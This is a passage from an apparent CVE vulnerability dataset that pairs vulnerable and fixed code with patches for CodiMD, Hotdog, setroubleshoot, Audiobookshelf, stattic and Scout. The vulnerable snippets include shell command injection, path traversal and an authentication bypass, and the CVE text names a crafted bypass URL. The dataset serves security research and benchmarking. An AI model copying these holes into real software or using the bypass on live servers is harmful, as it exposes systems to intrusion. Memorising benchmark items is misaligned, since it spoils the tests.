config.dropbox.clientID && config.dropbox.clientSecret\nconfig.isTwitterEnable = config.twitter.consumerKey && config.twitter.consumerSecret\nconfig.isEmailEnable = config.email\nconfig.isOpenIDEnable = config.openID\nconfig.isGitHubEnable = config.github.clientID && config.github.clientSecret\nconfig.isGitLabEnable = config.gitlab.clientID && config.gitlab.clientSecret\nconfig.isMattermostEnable = config.mattermost.clientID && config.mattermost.clientSecret\nconfig.isLDAPEnable = config.ldap.url\nconfig.isSAMLEnable = config.saml.idpSsoUrl\nconfig.isOAuth2Enable = config.oauth2.clientID && config.oauth2.clientSecret\nconfig.isPDFExportEnable = config.allowPDFExport\n\n// Check gitlab api version\nif (config.gitlab && config.gitlab.version !== 'v4' && config.gitlab.version !== 'v3') {\n logger.warn('config.js contains wrong version (' + config.gitlab.version + ') for gitlab api; it should be \\'v3\\' or \\'v4\\'. Defaulting to v4')\n config.gitlab.version = 'v4'\n}\n// If gitlab scope is api, enable snippets Export/import\nconfig.isGitlabSnippetsEnable = (!config.gitlab.scope || config.gitlab.scope === 'api') && config.isGitLabEnable\n\n// Only update i18n files in development setups\nconfig.updateI18nFiles = (env === Environment.development)\n\n// merge legacy values\nlet keys = Object.keys(config)\nconst uppercase = /[A-Z]/\nfor (let i = keys.length; i--;) {\n let lowercaseKey = keys[i].toLowerCase()\n // if the config contains uppercase letters\n // and a lowercase version of this setting exists\n // and the config with uppercase is not set\n // we set the new config using the old key.\n if (uppercase.test(keys[i]) &&\n config[lowercaseKey] !== undefined &&\n fileConfig[keys[i]] === undefined) {\n logger.warn('config.js contains deprecated lowercase setting for ' + keys[i] + '. 
Please change your config.js file to replace ' + lowercaseKey + ' with ' + keys[i])\n config[keys[i]] = config[lowercaseKey]\n }\n}\n\n// Notify users about the prefix change and inform them they use legacy prefix for environment variables\nif (Object.keys(process.env).toString().indexOf('HMD_') !== -1) {\n logger.warn('Using legacy HMD prefix for environment variables. Please change your variables in future. For details see: https://github.com/codimd/server#environment-variables-will-overwrite-other-server-configs')\n}\n\n// Generate session secret if it stays on default values\nif (config.sessionSecret === 'secret') {\n logger.warn('Session secret not set. Using random generated one. Please set `sessionSecret` in your config.js file. All users will be logged out.')\n config.sessionSecret = crypto.randomBytes(Math.ceil(config.sessionSecretLen / 2)) // generate crypto graphic random number\n .toString('hex') // convert to hexadecimal format\n .slice(0, config.sessionSecretLen) // return required number of characters\n}\n\n// Validate upload upload providers\nif (['filesystem', 's3', 'minio', 'imgur', 'azure', 'lutim'].indexOf(config.imageUploadType) === -1) {\n logger.error('\"imageuploadtype\" is not correctly set. Please use \"filesystem\", \"s3\", \"minio\", \"azure\", \"lutim\" or \"imgur\". Defaulting to \"filesystem\"')\n config.imageUploadType = 'filesystem'\n}\n\n// figure out mime types for image uploads\nswitch (config.imageUploadType) {\n case 'imgur':\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif'\n ]\n break\n default:\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif',\n 'image/svg+xml'\n ]\n}\n\n// generate correct path\nconfig.sslCAPath.forEach(function (capath, i, array) {\n array[i] = path.resolve(appRootPath, capath)\n})\n\nconfig.sslCertPath = path.resolve(appRootPath, config.sslCertPath)\nconfig.sslKeyPath = path.resolve(appRootPath, config.sslKeyPath)\nconfig.dhParamPath = path.resolve(appRootPath, config.dhParamPath)\nconfig.viewPath = path.resolve(appRootPath, config.viewPath)\nconfig.tmpPath = path.resolve(appRootPath, config.tmpPath)\nconfig.defaultNotePath = path.resolve(appRootPath, config.defaultNotePath)\nconfig.docsPath = path.resolve(appRootPath, config.docsPath)\nconfig.uploadsPath = path.resolve(appRootPath, config.uploadsPath)\n\n// make config readonly\nconfig = deepFreeze(config)\n\nmodule.exports = config"}], "fix_func": [{"id": "fix_js_293_1", "commit": "c1789474020a6d668d616464cb2da5e90e123f65", "file_path": "lib/config/index.js", "start_line": 1, "end_line": 215, "snippet": "\n'use strict'\n\nconst crypto = require('crypto')\nconst fs = require('fs')\nconst path = require('path')\nconst { merge } = require('lodash')\nconst deepFreeze = require('deep-freeze')\nconst { Environment, Permission } = require('./enum')\nconst logger = require('../logger')\nconst { getGitCommit, getGitHubURL } = require('./utils')\n\nconst appRootPath = path.resolve(__dirname, '../../')\nconst env = process.env.NODE_ENV || Environment.development\nconst debugConfig = {\n debug: (env === Environment.development)\n}\n\n// Get version string from package.json\nconst { version, repository } = require(path.join(appRootPath, 'package.json'))\n\nconst commitID = getGitCommit(appRootPath)\nconst sourceURL = getGitHubURL(repository.url, commitID || version)\nconst fullversion = commitID ? 
`${version}-${commitID}` : version\n\nconst packageConfig = {\n version: version,\n minimumCompatibleVersion: '0.5.0',\n fullversion: fullversion,\n sourceURL: sourceURL\n}\n\nconst configFilePath = path.resolve(appRootPath, process.env.CMD_CONFIG_FILE ||\n'config.json')\nconst fileConfig = fs.existsSync(configFilePath) ? require(configFilePath)[env] : undefined\n\nlet config = require('./default')\nmerge(config, require('./defaultSSL'))\nmerge(config, require('./oldDefault'))\nmerge(config, debugConfig)\nmerge(config, packageConfig)\nmerge(config, fileConfig)\nmerge(config, require('./oldEnvironment'))\nmerge(config, require('./hackmdEnvironment'))\nmerge(config, require('./environment'))\nmerge(config, require('./dockerSecret'))\n\nif (['debug', 'verbose', 'info', 'warn', 'error'].includes(config.loglevel)) {\n logger.level = config.loglevel\n} else {\n logger.error('Selected loglevel %s doesn\\'t exist, using default level \\'debug\\'. Available options: debug, verbose, info, warn, error', config.loglevel)\n}\n\n// load LDAP CA\nif (config.ldap.tlsca) {\n let ca = config.ldap.tlsca.split(',')\n let caContent = []\n for (let i of ca) {\n if (fs.existsSync(i)) {\n caContent.push(fs.readFileSync(i, 'utf8'))\n }\n }\n let tlsOptions = {\n ca: caContent\n }\n config.ldap.tlsOptions = config.ldap.tlsOptions ? Object.assign(config.ldap.tlsOptions, tlsOptions) : tlsOptions\n}\n\n// Permission\nconfig.permission = Permission\nif (!config.allowAnonymous && !config.allowAnonymousEdits) {\n delete config.permission.freely\n}\nif (!(config.defaultPermission in config.permission)) {\n config.defaultPermission = config.permission.editable\n}\n\n// cache result, cannot change config in runtime!!!\nconfig.isStandardHTTPsPort = (function isStandardHTTPsPort () {\n return config.useSSL && config.port === 443\n})()\nconfig.isStandardHTTPPort = (function isStandardHTTPPort () {\n return !config.useSSL && config.port === 80\n})()\n\n// cache serverURL\nconfig.serverURL = (function getserverurl () {\n var url = ''\n if (config.domain) {\n var protocol = config.protocolUseSSL ? 'https://' : 'http://'\n url = protocol + config.domain\n if (config.urlAddPort) {\n if (!config.isStandardHTTPPort || !config.isStandardHTTPsPort) {\n url += ':' + config.port\n }\n }\n }\n if (config.urlPath) {\n url += '/' + config.urlPath\n }\n return url\n})()\n\nif (config.serverURL === '') {\n logger.warn('Neither \\'domain\\' nor \\'CMD_DOMAIN\\' is configured. 
This can cause issues with various components.\\nHint: Make sure \\'protocolUseSSL\\' and \\'urlAddPort\\' or \\'CMD_PROTOCOL_USESSL\\' and \\'CMD_URL_ADDPORT\\' are configured properly.')\n}\n\nconfig.Environment = Environment\n\n// auth method\nconfig.isFacebookEnable = config.facebook.clientID && config.facebook.clientSecret\nconfig.isGoogleEnable = config.google.clientID && config.google.clientSecret\nconfig.isDropboxEnable = config.dropbox.clientID && config.dropbox.clientSecret\nconfig.isTwitterEnable = config.twitter.consumerKey && config.twitter.consumerSecret\nconfig.isEmailEnable = config.email\nconfig.isOpenIDEnable = config.openID\nconfig.isGitHubEnable = config.github.clientID && config.github.clientSecret\nconfig.isGitLabEnable = config.gitlab.clientID && config.gitlab.clientSecret\nconfig.isMattermostEnable = config.mattermost.clientID && config.mattermost.clientSecret\nconfig.isLDAPEnable = config.ldap.url\nconfig.isSAMLEnable = config.saml.idpSsoUrl\nconfig.isOAuth2Enable = config.oauth2.clientID && config.oauth2.clientSecret\nconfig.isPDFExportEnable = config.allowPDFExport\n\n// Check gitlab api version\nif (config.gitlab && config.gitlab.version !== 'v4' && config.gitlab.version !== 'v3') {\n logger.warn('config.js contains wrong version (' + config.gitlab.version + ') for gitlab api; it should be \\'v3\\' or \\'v4\\'. Defaulting to v4')\n config.gitlab.version = 'v4'\n}\n// If gitlab scope is api, enable snippets Export/import\nconfig.isGitlabSnippetsEnable = (!config.gitlab.scope || config.gitlab.scope === 'api') && config.isGitLabEnable\n\n// Only update i18n files in development setups\nconfig.updateI18nFiles = (env === Environment.development)\n\n// merge legacy values\nlet keys = Object.keys(config)\nconst uppercase = /[A-Z]/\nfor (let i = keys.length; i--;) {\n let lowercaseKey = keys[i].toLowerCase()\n // if the config contains uppercase letters\n // and a lowercase version of this setting exists\n // and the config with uppercase is not set\n // we set the new config using the old key.\n if (uppercase.test(keys[i]) &&\n config[lowercaseKey] !== undefined &&\n fileConfig[keys[i]] === undefined) {\n logger.warn('config.js contains deprecated lowercase setting for ' + keys[i] + '. Please change your config.js file to replace ' + lowercaseKey + ' with ' + keys[i])\n config[keys[i]] = config[lowercaseKey]\n }\n}\n\n// Notify users about the prefix change and inform them they use legacy prefix for environment variables\nif (Object.keys(process.env).toString().indexOf('HMD_') !== -1) {\n logger.warn('Using legacy HMD prefix for environment variables. Please change your variables in future. For details see: https://github.com/codimd/server#environment-variables-will-overwrite-other-server-configs')\n}\n\n// Generate session secret if it stays on default values\nif (config.sessionSecret === 'secret') {\n logger.warn('Session secret not set. Using random generated one. Please set `sessionSecret` in your config.js file. All users will be logged out.')\n config.sessionSecret = crypto.randomBytes(Math.ceil(config.sessionSecretLen / 2)) // generate crypto graphic random number\n .toString('hex') // convert to hexadecimal format\n .slice(0, config.sessionSecretLen) // return required number of characters\n}\n\n// Validate upload upload providers\nif (['filesystem', 's3', 'minio', 'imgur', 'azure', 'lutim'].indexOf(config.imageUploadType) === -1) {\n logger.error('\"imageuploadtype\" is not correctly set. 
Please use \"filesystem\", \"s3\", \"minio\", \"azure\", \"lutim\" or \"imgur\". Defaulting to \"filesystem\"')\n config.imageUploadType = 'filesystem'\n}\n\n// figure out mime types for image uploads\nswitch (config.imageUploadType) {\n case 'imgur':\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif'\n ]\n break\n default:\n config.allowedUploadMimeTypes = [\n 'image/jpeg',\n 'image/png',\n 'image/jpg',\n 'image/gif',\n 'image/svg+xml'\n ]\n}\n\n// Disable PDF export due to security issue\nif (config.allowPDFExport) {\n config.allowPDFExport = false\n logger.warn('PDF export was disabled for this release to mitigate a critical security issue. This feature will hopefully become available again in future releases.')\n}\n\n// generate correct path\nconfig.sslCAPath.forEach(function (capath, i, array) {\n array[i] = path.resolve(appRootPath, capath)\n})\n\nconfig.sslCertPath = path.resolve(appRootPath, config.sslCertPath)\nconfig.sslKeyPath = path.resolve(appRootPath, config.sslKeyPath)\nconfig.dhParamPath = path.resolve(appRootPath, config.dhParamPath)\nconfig.viewPath = path.resolve(appRootPath, config.viewPath)\nconfig.tmpPath = path.resolve(appRootPath, config.tmpPath)\nconfig.defaultNotePath = path.resolve(appRootPath, config.defaultNotePath)\nconfig.docsPath = path.resolve(appRootPath, config.docsPath)\nconfig.uploadsPath = path.resolve(appRootPath, config.uploadsPath)\n\n// make config readonly\nconfig = deepFreeze(config)\n\nmodule.exports = config"}], "vul_patch": "--- a/lib/config/index.js\n+++ b/lib/config/index.js\n@@ -189,6 +189,12 @@\n ]\n }\n \n+// Disable PDF export due to security issue\n+if (config.allowPDFExport) {\n+ config.allowPDFExport = false\n+ logger.warn('PDF export was disabled for this release to mitigate a critical security issue. This feature will hopefully become available again in future releases.')\n+}\n+\n // generate correct path\n config.sslCAPath.forEach(function (capath, i, array) {\n array[i] = path.resolve(appRootPath, capath)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-3101", "cve_description": "Hotdog, prior to v1.0.1, did not mimic the capabilities or the SELinux label of the target JVM process. 
This would allow a container to gain full privileges on the host, bypassing restrictions set on the container.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/bottlerocket-os/hotdog", "patch_url": ["https://github.com/bottlerocket-os/hotdog/commit/a6fc818dfc5da42f02807250845f75aac0ee9018"], "programing_language": "Go", "vul_func": [{"id": "vul_go_208_1", "commit": "89bd117", "file_path": "cmd/hotdog-poststart-hook/main.go", "start_line": 18, "end_line": 29, "snippet": "func _main() error {\n\tstate, err := hook.State()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thotpatch := exec.Command(\"nsenter\",\n\t\t\"-t\", strconv.Itoa(state.Pid),\n\t\t\"-m\", \"-n\", \"-i\", \"-u\", \"-p\",\n\t\tfilepath.Join(hotdog.ContainerDir, hotdog.HotpatchBinary))\n\treturn hotpatch.Start()\n}"}], "fix_func": [{"id": "fix_go_208_1", "commit": "a6fc818dfc5da42f02807250845f75aac0ee9018", "file_path": "cmd/hotdog-poststart-hook/main.go", "start_line": 21, "end_line": 42, "snippet": "func _main() error {\n\tstate, err := hook.State()\n\tif err != nil {\n\t\treturn err\n\t}\n\tspec, err := hook.Config(state)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif spec.Process.SelinuxLabel != \"\" {\n\t\truntime.LockOSThread()\n\t\tdefer runtime.UnlockOSThread()\n\t\tif err := selinux.SetExecLabel(spec.Process.SelinuxLabel); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\thotpatch := exec.Command(\"nsenter\",\n\t\t\"-t\", strconv.Itoa(state.Pid),\n\t\t\"-m\", \"-n\", \"-i\", \"-u\", \"-p\",\n\t\tfilepath.Join(hotdog.ContainerDir, hotdog.HotpatchBinary))\n\treturn hotpatch.Start()\n}"}], "vul_patch": "--- a/cmd/hotdog-poststart-hook/main.go\n+++ b/cmd/hotdog-poststart-hook/main.go\n@@ -3,7 +3,17 @@\n \tif err != nil {\n \t\treturn err\n \t}\n-\n+\tspec, err := hook.Config(state)\n+\tif err != nil {\n+\t\treturn err\n+\t}\n+\tif spec.Process.SelinuxLabel != \"\" {\n+\t\truntime.LockOSThread()\n+\t\tdefer runtime.UnlockOSThread()\n+\t\tif err := selinux.SetExecLabel(spec.Process.SelinuxLabel); err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t}\n \thotpatch := exec.Command(\"nsenter\",\n \t\t\"-t\", strconv.Itoa(state.Pid),\n \t\t\"-m\", \"-n\", \"-i\", \"-u\", \"-p\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-4446", "cve_description": "The allow_execstack plugin for setroubleshoot allows local users to execute arbitrary commands by triggering an execstack SELinux denial with a crafted filename, related to the commands.getoutput function.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/fedora-selinux/setroubleshoot", "patch_url": ["https://github.com/fedora-selinux/setroubleshoot/commit/eaccf4c0d20a27d3df5ff6de8c9dcc80f6f40718"], "programing_language": "Python", "vul_func": [{"id": "vul_py_392_1", "commit": "dda55aa50db95a25f0d919c3a0d5871827cdc40f", "file_path": "plugins/src/allow_execstack.py", "start_line": 29, "end_line": 34, "snippet": "def is_execstack(path):\n if path[0] != \"/\":\n return False\n\n x = 
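The Hotdog patch (CVE-2021-3101) above copies the target JVM's SELinux label onto the hook before it enters the container's namespaces. A conceptual Python equivalent, assuming Linux with SELinux enabled; the exec attribute is per-thread, which is why the Go fix pins the OS thread with LockOSThread:

def selinux_label_of(pid):
    # The process's current SELinux context, as exposed by procfs.
    with open("/proc/%d/attr/current" % pid) as f:
        return f.read().rstrip("\x00\n")

def set_exec_label(label):
    # Roughly what libselinux setexeccon() does: the next execve() on this
    # thread runs under `label` instead of inheriting our own context.
    with open("/proc/thread-self/attr/exec", "w") as f:
        f.write(label)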
commands.getoutput(\"execstack -q %s\" % path).split()\n return ( x[0] == \"X\" )"}, {"id": "vul_py_392_2", "commit": "dda55aa50db95a25f0d919c3a0d5871827cdc40f", "file_path": "plugins/src/allow_execstack.py", "start_line": 36, "end_line": 50, "snippet": "def find_execstack(exe, pid):\n execstacklist = []\n for path in commands.getoutput(\"ldd %s\" % exe).split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n try:\n fd = open(\"/proc/%s/maps\" % pid , \"r\")\n for rec in fd.readlines():\n for path in rec.split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n except IOError:\n pass\n\n return execstacklist"}], "fix_func": [{"id": "fix_py_392_1", "commit": "eaccf4c0d20a27d3df5ff6de8c9dcc80f6f40718", "file_path": "plugins/src/allow_execstack.py", "start_line": 29, "end_line": 34, "snippet": "def is_execstack(path):\n if path[0] != \"/\":\n return False\n\n x = subprocess.check_output([\"execstack\", \"-q\", path], universal_newlines=True).split()\n return ( x[0] == \"X\" )"}, {"id": "fix_py_392_2", "commit": "eaccf4c0d20a27d3df5ff6de8c9dcc80f6f40718", "file_path": "plugins/src/allow_execstack.py", "start_line": 36, "end_line": 50, "snippet": "def find_execstack(exe, pid):\n execstacklist = []\n for path in subprocess.check_output([\"ldd\", exe], universal_newlines=True).split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n try:\n fd = open(\"/proc/%s/maps\" % pid , \"r\")\n for rec in fd.readlines():\n for path in rec.split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n except IOError:\n pass\n\n return execstacklist"}], "vul_patch": "--- a/plugins/src/allow_execstack.py\n+++ b/plugins/src/allow_execstack.py\n@@ -2,5 +2,5 @@\n if path[0] != \"/\":\n return False\n \n- x = commands.getoutput(\"execstack -q %s\" % path).split()\n- return ( x[0] == \"X\" )\n+ x = subprocess.check_output([\"execstack\", \"-q\", path], universal_newlines=True).split()\n+ return ( x[0] == \"X\" )\n\n--- a/plugins/src/allow_execstack.py\n+++ b/plugins/src/allow_execstack.py\n@@ -1,6 +1,6 @@\n def find_execstack(exe, pid):\n execstacklist = []\n- for path in commands.getoutput(\"ldd %s\" % exe).split():\n+ for path in subprocess.check_output([\"ldd\", exe], universal_newlines=True).split():\n if is_execstack(path) and path not in execstacklist:\n execstacklist.append(path)\n try:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-25205", "cve_description": "Audiobookshelf is a self-hosted audiobook and podcast server. Starting in version 2.17.0 and prior to version 2.19.1, a flaw in the authentication bypass logic allows unauthenticated requests to match certain unanchored regex patterns in the URL. Attackers can craft URLs containing substrings like \"/api/items/1/cover\" in a query parameter (?r=/api/items/1/cover) to partially bypass authentication or trigger server crashes under certain routes. This could lead to information disclosure of otherwise protected data and, in some cases, a complete denial of service (server crash) if downstream code expects an authenticated user object. 
Version 2.19.1 contains a patch for the issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/advplyr/audiobookshelf", "patch_url": ["https://github.com/advplyr/audiobookshelf/commit/bf8407274e3ee300af1927ee660d078a7a801e1c"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_250_1", "commit": "3bc2941", "file_path": "server/Auth.js", "start_line": 18, "end_line": 22, "snippet": " constructor() {\n // Map of openId sessions indexed by oauth2 state-variable\n this.openIdAuthSession = new Map()\n this.ignorePattern = /\\/api\\/items\\/[^/]+\\/cover/\n }"}, {"id": "vul_js_250_2", "commit": "3bc2941", "file_path": "server/Auth.js", "start_line": 30, "end_line": 32, "snippet": " authNotNeeded(req) {\n return req.method === 'GET' && this.ignorePattern.test(req.originalUrl)\n }"}], "fix_func": [{"id": "fix_js_250_1", "commit": "bf8407274e3ee300af1927ee660d078a7a801e1c", "file_path": "server/Auth.js", "start_line": 18, "end_line": 22, "snippet": " constructor() {\n // Map of openId sessions indexed by oauth2 state-variable\n this.openIdAuthSession = new Map()\n this.ignorePatterns = [/\\/api\\/items\\/[^/]+\\/cover/, /\\/api\\/authors\\/[^/]+\\/image/]\n }"}, {"id": "fix_js_250_2", "commit": "bf8407274e3ee300af1927ee660d078a7a801e1c", "file_path": "server/Auth.js", "start_line": 30, "end_line": 32, "snippet": " authNotNeeded(req) {\n return req.method === 'GET' && this.ignorePatterns.some((pattern) => pattern.test(req.originalUrl))\n }"}], "vul_patch": "--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -1,5 +1,5 @@\n constructor() {\n // Map of openId sessions indexed by oauth2 state-variable\n this.openIdAuthSession = new Map()\n- this.ignorePattern = /\\/api\\/items\\/[^/]+\\/cover/\n+ this.ignorePatterns = [/\\/api\\/items\\/[^/]+\\/cover/, /\\/api\\/authors\\/[^/]+\\/image/]\n }\n\n--- a/server/Auth.js\n+++ b/server/Auth.js\n@@ -1,3 +1,3 @@\n authNotNeeded(req) {\n- return req.method === 'GET' && this.ignorePattern.test(req.originalUrl)\n+ return req.method === 'GET' && this.ignorePatterns.some((pattern) => pattern.test(req.originalUrl))\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-3734", "cve_description": "stattic node module suffers from a Path Traversal vulnerability due to lack of validation of path, which allows a malicious user to read content of any file with known path.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/jmjuanes/stattic", "patch_url": ["https://github.com/jmjuanes/stattic/commit/1649daafa646b12d7311640690df967b0107d768"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_41_1", "commit": "952c145", "file_path": "index.js", "start_line": 31, "end_line": 106, "snippet": "module.exports.listen = function (port, cb) {\n //Parse the arguments\n cb = (typeof port === \"function\") ? port : cb;\n port = (typeof port === \"number\") ? 
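For the Audiobookshelf entry (CVE-2025-25205), the diff shown only extends the pattern list; the bypass described in the CVE stems from testing unanchored regexes against req.originalUrl, which still contains the query string. A Python illustration of the failure mode, plus one possible hardening (anchoring and testing only the path is an assumption, not the project's actual fix):

import re
from urllib.parse import urlsplit

ignore = re.compile(r"/api/items/[^/]+/cover")   # unanchored, as in Auth.js

original_url = "/api/me?r=/api/items/1/cover"    # attacker-crafted URL
assert ignore.search(original_url)               # matches inside the query part

# One hardening: anchor the pattern and test only the path component.
anchored = re.compile(r"^/api/items/[^/]+/cover$")
assert not anchored.search(urlsplit(original_url).path)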
parseInt(port) : options.port;\n\n //Get the static files folder path\n options.folder = path.resolve(process.cwd(), options.folder);\n\n //Get the error file path\n options.error = path.resolve(process.cwd(), options.error);\n\n //Initialize the server\n let server = http.createServer(function (req, res) {\n let timeStart = Date.now();\n\n //Check the cors option\n if (options.cors === true) {\n res.setHeader(\"Access-Control-Allow-Origin\", \"*\");\n res.setHeader(\"Access-Control-Allow-Methods\", \"GET, POST, OPTIONS, PUT, PATCH, DELETE\");\n res.setHeader(\"Access-Control-Allow-Headers\", \"X-Requested-With,content-type\");\n }\n let pathname = url.parse(req.url).pathname;\n let localPath = path.join(options.folder, pathname);\n if (path.extname(localPath) === \"\") {\n //Add the index file to the local path\n localPath = path.join(localPath, \"./\" + path.basename(options.index));\n }\n\n //Reponse finish event\n res.on(\"finish\", function () {\n console.log(\"\" + res.statusCode + \" \" + pathname + \" \" + (Date.now() - timeStart) + \" ms\");\n });\n\n //Check if the file exists in this directory\n return utily.fs.isFile(localPath, function (error, exists) {\n if (error) {\n return errorPage(res, 500, \"Error processing your request.\");\n }\n if (exists === false) {\n return errorPage(res, 404, \"File not found.\");\n }\n\n //Write the header with the content type\n res.writeHead(200, {\"Content-Type\": mime.getType(localPath)});\n\n //Initialize the reader stream\n //let reader = fs.createReadStream(local_path, { encoding: \"utf8\" });\n //Remove encoding -> fixed bug reading images (jpg, png, etc...)\n let reader = fs.createReadStream(localPath);\n reader.on(\"data\", function (data) {\n //Write the data to the response\n res.write(data);\n });\n reader.on(\"end\", function () {\n res.end(\"\");\n });\n reader.on(\"error\", function (error) {\n return errorPage(res, 500, \"Something went wrong...\");\n })\n });\n });\n\n //Start server\n server.listen(port, function () {\n if (typeof cb === \"function\") {\n cb.call(null);\n }\n else {\n //Show the console log success\n console.log(\"\");\n console.log(\"Static server listening on: \" + \"http://localhost:\" + options.port + \"\");\n console.log(\"Reading files from: \" + options.folder + \"\");\n console.log(\"\");\n }\n });\n};"}], "fix_func": [{"id": "fix_js_41_1", "commit": "1649daafa646b12d7311640690df967b0107d768", "file_path": "index.js", "start_line": 31, "end_line": 107, "snippet": "module.exports.listen = function (port, cb) {\n //Parse the arguments\n cb = (typeof port === \"function\") ? port : cb;\n port = (typeof port === \"number\") ? 
parseInt(port) : options.port;\n\n //Get the static files folder path\n options.folder = path.resolve(process.cwd(), options.folder);\n\n //Get the error file path\n options.error = path.resolve(process.cwd(), options.error);\n\n //Initialize the server\n let server = http.createServer(function (req, res) {\n let timeStart = Date.now();\n\n //Check the cors option\n if (options.cors === true) {\n res.setHeader(\"Access-Control-Allow-Origin\", \"*\");\n res.setHeader(\"Access-Control-Allow-Methods\", \"GET, POST, OPTIONS, PUT, PATCH, DELETE\");\n res.setHeader(\"Access-Control-Allow-Headers\", \"X-Requested-With,content-type\");\n }\n let pathname = url.parse(req.url).pathname;\n pathname = path.normalize(pathname); //Fix path traversal\n let localPath = path.join(options.folder, pathname);\n if (path.extname(localPath) === \"\") {\n //Add the index file to the local path\n localPath = path.join(localPath, \"./\" + path.basename(options.index));\n }\n\n //Reponse finish event\n res.on(\"finish\", function () {\n console.log(\"\" + res.statusCode + \" \" + pathname + \" \" + (Date.now() - timeStart) + \" ms\");\n });\n\n //Check if the file exists in this directory\n return utily.fs.isFile(localPath, function (error, exists) {\n if (error) {\n return errorPage(res, 500, \"Error processing your request.\");\n }\n if (exists === false) {\n return errorPage(res, 404, \"File not found.\");\n }\n\n //Write the header with the content type\n res.writeHead(200, {\"Content-Type\": mime.getType(localPath)});\n\n //Initialize the reader stream\n //let reader = fs.createReadStream(local_path, { encoding: \"utf8\" });\n //Remove encoding -> fixed bug reading images (jpg, png, etc...)\n let reader = fs.createReadStream(localPath);\n reader.on(\"data\", function (data) {\n //Write the data to the response\n res.write(data);\n });\n reader.on(\"end\", function () {\n res.end(\"\");\n });\n reader.on(\"error\", function (error) {\n return errorPage(res, 500, \"Something went wrong...\");\n })\n });\n });\n\n //Start server\n server.listen(port, function () {\n if (typeof cb === \"function\") {\n cb.call(null);\n }\n else {\n //Show the console log success\n console.log(\"\");\n console.log(\"Static server listening on: \" + \"http://localhost:\" + options.port + \"\");\n console.log(\"Reading files from: \" + options.folder + \"\");\n console.log(\"\");\n }\n });\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -20,6 +20,7 @@\n res.setHeader(\"Access-Control-Allow-Headers\", \"X-Requested-With,content-type\");\n }\n let pathname = url.parse(req.url).pathname;\n+ pathname = path.normalize(pathname); //Fix path traversal\n let localPath = path.join(options.folder, pathname);\n if (path.extname(localPath) === \"\") {\n //Add the index file to the local path\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-3734:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/stattic\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest --forceExit ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2024-47531", "cve_description": "Scout is a web-based visualizer for VCF-files. Due to the lack of sanitization in the filename, it is possible to bypass the intended file extension and make users download malicious files with any extension. With malicious content injected inside the file data, users unknowingly downloading and opening the file may lead to the compromise of their devices or data.
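The stattic patch above normalizes the URL pathname before joining it onto the static root, so Node's path.normalize collapses the ../ segments and the join can no longer climb out. A Python analogue using an explicit containment check instead (function name and root are illustrative, not the module's code):

import os

def resolve_local_path(root, url_path):
    # Join, normalize, then verify the result is still inside the root.
    candidate = os.path.normpath(os.path.join(root, url_path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise PermissionError("path escapes the static root")
    return candidate

root = "/srv/static"
assert resolve_local_path(root, "/css/app.css") == "/srv/static/css/app.css"
try:
    resolve_local_path(root, "/../../etc/passwd")
except PermissionError:
    pass  # traversal rejected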
This vulnerability is fixed in 4.89.", "cwe_info": {"CWE-116": {"name": "Improper Encoding or Escaping of Output", "description": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved."}}, "repo": "https://github.com/Clinical-Genomics/scout", "patch_url": ["https://github.com/Clinical-Genomics/scout/commit/f59e50f8ea596e641da8a0e9c7a33c0696bcbea5"], "programing_language": "Python", "vul_func": [{"id": "vul_py_381_1", "commit": "679c42e635d4554c630a0018420b163586f9ef48", "file_path": "scout/server/blueprints/panels/controllers.py", "start_line": 303, "end_line": 319, "snippet": "def downloaded_panel_name(panel_obj, format) -> str:\n \"\"\"Return a string with the file name to be downloaded\n\n Args:\n panel_obj(dict): scout.models.panel.gene_panel\n format(str): \"pdf\" or \"txt\"\n Returns:\n a string describing the panel\n \"\"\"\n return \"_\".join(\n [\n panel_obj[\"panel_name\"],\n str(panel_obj[\"version\"]),\n dt.datetime.now().strftime(DATE_DAY_FORMATTER),\n f\"scout.{format}\",\n ]\n )"}], "fix_func": [{"id": "fix_py_381_1", "commit": "f59e50f8ea596e641da8a0e9c7a33c0696bcbea5", "file_path": "scout/server/blueprints/panels/controllers.py", "start_line": 304, 